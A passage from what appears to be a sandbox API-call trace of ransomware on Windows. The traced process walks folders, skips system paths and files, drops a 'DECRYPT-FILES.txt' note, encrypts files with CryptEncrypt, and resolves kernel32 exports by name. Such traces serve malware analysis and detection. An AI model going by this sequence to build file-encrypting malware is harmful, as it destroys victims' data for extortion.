HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="AhnLab") returned 0x0 [0085.677] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.677] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.677] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\jkbimi8.tmp") returned 68 [0085.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0085.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.677] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.677] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\DECRYPT-FILES.txt") returned 74 [0085.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0085.678] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0085.679] CloseHandle (hObject=0x414) returned 1 [0085.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\*" [0085.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0085.679] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.679] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.679] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.679] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.679] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3876e740, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0xbf8976f0, ftLastAccessTime.dwHighDateTime=0x1d4ca18, ftLastWriteTime.dwLowDateTime=0xbf8976f0, ftLastWriteTime.dwHighDateTime=0x1d4ca18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="COGT", cAlternateFileName="")) returned 1 [0085.679] lstrcmpW (lpString1="COGT", lpString2=".") returned 1 [0085.679] lstrcmpW (lpString1="COGT", lpString2="..") returned 1 [0085.679] lstrcatW (in: lpString1="COGT", lpString2="\\" | out: lpString1="COGT\\") returned="COGT\\" [0085.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Program Files") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch=":\\Windows") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Games\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\All Users") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.679] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="AhnLab") returned 0x0 [0085.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.680] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.680] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\jkbimi8.tmp") returned 73 [0085.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0085.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.680] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.680] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\DECRYPT-FILES.txt") returned 79 [0085.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0085.681] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0085.682] CloseHandle (hObject=0x42c) returned 1 [0085.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\*" [0085.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3876e740, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0085.682] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.682] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3876e740, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.682] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.682] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.682] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f4dbf80, ftCreationTime.dwHighDateTime=0x1d4c534, ftLastAccessTime.dwLowDateTime=0xb19a4420, ftLastAccessTime.dwHighDateTime=0x1d4d4ea, ftLastWriteTime.dwLowDateTime=0xb19a4420, ftLastWriteTime.dwHighDateTime=0x1d4d4ea, nFileSizeHigh=0x0, nFileSizeLow=0x1654a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cK A cQIxO.wav", cAlternateFileName="CKACQI~1.WAV")) returned 1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="DECRYPT-FILES.txt") returned -1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="autorun.inf") returned 1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="boot.ini") returned 1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="desktop.ini") returned -1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="ntuser.dat") returned -1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="iconcache.db") returned -1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="bootsect.bak") returned 1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="ntuser.dat.log") returned -1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="thumbs.db") returned -1 [0085.682] lstrcmpiW (lpString1="cK A cQIxO.wav", lpString2="Bootfont.bin") returned 1 [0085.682] lstrlenW (lpString="cK A cQIxO.wav") returned 14 [0085.682] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.682] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.682] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.682] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.682] lstrlenW (lpString="cK A cQIxO.wav") returned 14 [0085.682] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.683] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="cK A cQIxO.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav" [0085.683] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ck a cqixo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.683] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=91466) returned 1 [0085.683] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.683] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.683] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.683] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.683] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.684] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.684] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.685] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.686] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.687] CloseHandle (hObject=0x43c) returned 1 [0085.687] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.687] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.688] CloseHandle (hObject=0x0) returned 0 [0085.688] CloseHandle (hObject=0x438) returned 1 [0085.688] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.688] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.688] GetTickCount () returned 0x114de10 [0085.688] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.688] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.689] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.689] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.689] lstrlenA (lpString="kernel32.dll") returned 12 [0085.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.689] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.689] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.689] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.689] lstrlenA (lpString="ADDATOMA") returned 8 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.689] lstrlenA (lpString="ADDATOMW") returned 8 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.689] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.690] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.690] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.690] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.690] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.690] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.690] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.690] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.690] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.690] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.690] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.690] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.690] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.690] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.690] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.690] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.690] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.690] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.690] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.690] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.691] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.691] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.691] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.691] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.691] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.691] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.691] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.691] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.691] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.691] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.691] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.691] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: 